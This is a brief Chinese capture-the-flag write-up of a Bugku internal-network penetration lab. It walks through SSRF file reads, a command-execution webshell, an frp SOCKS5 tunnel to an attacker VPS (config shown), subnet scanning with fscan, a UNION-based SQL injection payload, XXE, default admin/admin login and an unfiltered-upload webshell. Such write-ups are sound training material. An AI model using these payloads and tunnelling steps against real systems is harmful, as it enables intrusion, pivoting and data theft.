本题一共八个flag,主要是为了练习内网渗透的思路。
首先给了一个站长之家-模拟蜘蛛爬取,这个以前见到过,存在sstf漏洞,直接读取文件。
file:///flag
既然是要内网渗透,那肯定要看/etc/hosts。
file:///etc/hosts
爆破192.168.0.2端口,发现存在192.168.0.10,是一个被黑的页面。
尝试访问shell文件,发现shell.php可命令执行。
想传入一句话木马连接蚁剑,首先需要内网穿透开启代理,利用wget将所需要的文件下载上去。
然后启动frpc服务,需要先在vps上启动frps,代理连接后即可传入一句话木马来连接蚁剑。
命令:
vps ./frps -c frps.ini (先运行)
靶机 ./frpc -c frpc.ini
frpc.ini配置文内容
[common]
server_addr = vps
server_port = 7000
[socks5]
type = tcp
remote_port = 7001
plugin = socks5
在html下和根目录下各有一个flag。
然后上传fscan扫描10.10.0.0/24和192.168.0.0/24。
192.168.0.138为分数查询系统,存在sql注入。
4 union select 1,2,3,(select+*+from+flag)#
在192.168.0.250中存在登录框,登录成功后并无回显,最后xxe尝试成功,在html下和根目录下各有两个flag。
又在10.10.0.22中发现bugku管理页面,存在admin.php后台。
admin admin登陆成功。
发现有文件上传功能且没有过滤,可直接传入一句话木马,在html目录和根目录下各有两个flag。